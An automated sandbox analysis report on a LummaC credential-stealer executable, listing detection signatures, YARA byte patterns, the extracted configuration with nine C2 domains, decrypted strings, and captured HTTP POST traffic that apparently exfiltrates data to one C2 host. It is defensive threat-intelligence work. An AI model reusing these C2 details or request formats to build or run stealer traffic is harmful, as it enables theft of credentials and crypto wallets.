Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
20qMFnd9tO.exe

Overview

General Information

Sample name:20qMFnd9tO.exe
renamed because original name is a hash value
Original sample name:0f4a71f80cd80f172817f116318e3fca.exe
Analysis ID:1417393
MD5:0f4a71f80cd80f172817f116318e3fca
SHA1:cf0d014f19140c6fb86beeeb078cc3cc9fe99a77
SHA256:fe2ad4001c817a77de2e7d4ca694833fef66c99beee799333fc84e74da4cad5e
Tags:32exetrojan
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 20qMFnd9tO.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\20qMFnd9tO.exe" MD5: 0F4A71F80CD80F172817F116318E3FCA)
    • WerFault.exe (PID: 7716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["pillowbrocccolipe.shop", "communicationgenerwo.shop", "diskretainvigorousiw.shop", "affordcharmcropwo.shop", "dismissalcylinderhostw.shop", "enthusiasimtitleow.shop", "worryfillvolcawoi.shop", "cleartotalfisherwo.shop", "wagonglidemonkywo.shop"], "Build id": "P6Mk0M--key"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1498:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Process Memory Space: 20qMFnd9tO.exe PID: 7556JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: 20qMFnd9tO.exe PID: 7556JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 20qMFnd9tO.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://wagonglidemonkywo.shop:443/apiAvira URL Cloud: Label: malware
            Source: https://wagonglidemonkywo.shop/apiAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0.2.20qMFnd9tO.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["pillowbrocccolipe.shop", "communicationgenerwo.shop", "diskretainvigorousiw.shop", "affordcharmcropwo.shop", "dismissalcylinderhostw.shop", "enthusiasimtitleow.shop", "worryfillvolcawoi.shop", "cleartotalfisherwo.shop", "wagonglidemonkywo.shop"], "Build id": "P6Mk0M--key"}
            Multi AV Scanner detection for domain / URL
            Source: https://wagonglidemonkywo.shop:443/apiVirustotal: Detection: 9%Perma Link
            Source: https://wagonglidemonkywo.shop/apiVirustotal: Detection: 9%Perma Link
            Multi AV Scanner detection for submitted file
            Source: 20qMFnd9tO.exeReversingLabs: Detection: 38%
            Source: 20qMFnd9tO.exeVirustotal: Detection: 38%Perma Link
            Machine Learning detection for sample
            Source: 20qMFnd9tO.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: pillowbrocccolipe.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: communicationgenerwo.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: diskretainvigorousiw.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: affordcharmcropwo.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: dismissalcylinderhostw.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: enthusiasimtitleow.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: worryfillvolcawoi.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: cleartotalfisherwo.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wagonglidemonkywo.shop
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: P6Mk0M--key
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004162C7 CryptUnprotectData,0_2_004162C7

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeUnpacked PE file: 0.2.20qMFnd9tO.exe.400000.0.unpack
            Source: 20qMFnd9tO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi]0_2_004381B0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esp]0_2_004162C7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esp+10h]0_2_00409BC0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_00419E30
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then lea esi, dword ptr [edx+ecx]0_2_0041EFD0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_0042404C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then push 00000000h0_2_00411007
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_00424038
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edi, dword ptr [esi+10h]0_2_004210E3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ebx, dword ptr [esp]0_2_004110A3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp ecx0_2_004231D2
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then inc ecx0_2_00414190
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]0_2_004171A5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esp+000000BCh]0_2_0041B230
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]0_2_004122E0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_004232E4
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_00422355
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_00422355
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_004183C0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0042E3D0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_004223FC
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]0_2_00423381
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ebx, eax0_2_00414397
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]0_2_00421418
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ebx, dword ptr [esi]0_2_0042342A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_00422328
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp dword ptr [eax-08h], 18DC7455h0_2_00432600
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_00402620
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+0Ch]0_2_0041D634
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+74h]0_2_004206F1
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp ecx0_2_004206F1
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004226A7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004226A4
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh0_2_0041B6AF
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp eax0_2_00421770
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov dword ptr [esi+08h], edx0_2_0041D878
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00421FEE
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then lea eax, dword ptr [edi+04h]0_2_0041F94E
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]0_2_004149A0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then lea eax, dword ptr [esi+000000D4h]0_2_00420A55
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp word ptr [esp+eax+000000A0h], 0000h0_2_00433A9A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then inc ebx0_2_0041DBCB
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp word ptr [esp+eax+000000A0h], 0000h0_2_00433A95
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then inc edi0_2_00402CD0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]0_2_0040DF20
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp eax0_2_0041FFD9
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00421FF3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_00423FF3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_006FA097
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]0_2_006EE187
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then push 00000000h0_2_006F126E
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0070225A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_0070425A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp eax0_2_00700245
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then lea esi, dword ptr [edx+ecx]0_2_006FF237
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_007042B3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_0070429F
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edi, dword ptr [esi+10h]0_2_0070134A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ebx, dword ptr [esp]0_2_006F130A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then inc ecx0_2_006F43F7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp ecx0_2_00703439
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]0_2_006F740C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi]0_2_00718417
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esp+000000BCh]0_2_006FB497
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]0_2_006F2547
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]0_2_0070354B
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esp]0_2_006F652E
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ebx, eax0_2_006F45FE
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]0_2_007035E8
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_007025BC
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_007025BC
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]0_2_0070167F
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_00702663
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0070E637
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_006F8627
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov ebx, dword ptr [esi]0_2_00703691
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_0070258F
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp dword ptr [eax-08h], 18DC7455h0_2_00712867
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_006E2887
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+0Ch]0_2_006FD89B
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+74h]0_2_00700958
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp ecx0_2_00700958
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh0_2_006FB916
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0070290B
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0070290E
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then jmp eax0_2_007019D7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edi, ecx0_2_006FA981
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00702255
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov dword ptr [esi+08h], edx0_2_006FDADF
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then lea eax, dword ptr [edi+04h]0_2_006FFBB5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]0_2_006F4C07
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then lea eax, dword ptr [esi+000000D4h]0_2_00700CBC
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp word ptr [esp+eax+000000A0h], 0000h0_2_00713D01
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp word ptr [esp+eax+000000A0h], 0000h0_2_00713CFC
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h0_2_006FAE7B
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh0_2_006FEE57
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then mov edx, dword ptr [esp+10h]0_2_006E9E27
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 4x nop then inc ebx0_2_006FDE32

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: pillowbrocccolipe.shop
            Source: Malware configuration extractorURLs: communicationgenerwo.shop
            Source: Malware configuration extractorURLs: diskretainvigorousiw.shop
            Source: Malware configuration extractorURLs: affordcharmcropwo.shop
            Source: Malware configuration extractorURLs: dismissalcylinderhostw.shop
            Source: Malware configuration extractorURLs: enthusiasimtitleow.shop
            Source: Malware configuration extractorURLs: worryfillvolcawoi.shop
            Source: Malware configuration extractorURLs: cleartotalfisherwo.shop
            Source: Malware configuration extractorURLs: wagonglidemonkywo.shop
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wagonglidemonkywo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: wagonglidemonkywo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18161Host: wagonglidemonkywo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8782Host: wagonglidemonkywo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: wagonglidemonkywo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7082Host: wagonglidemonkywo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1410Host: wagonglidemonkywo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 593802Host: wagonglidemonkywo.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: wagonglidemonkywo.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wagonglidemonkywo.shop
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
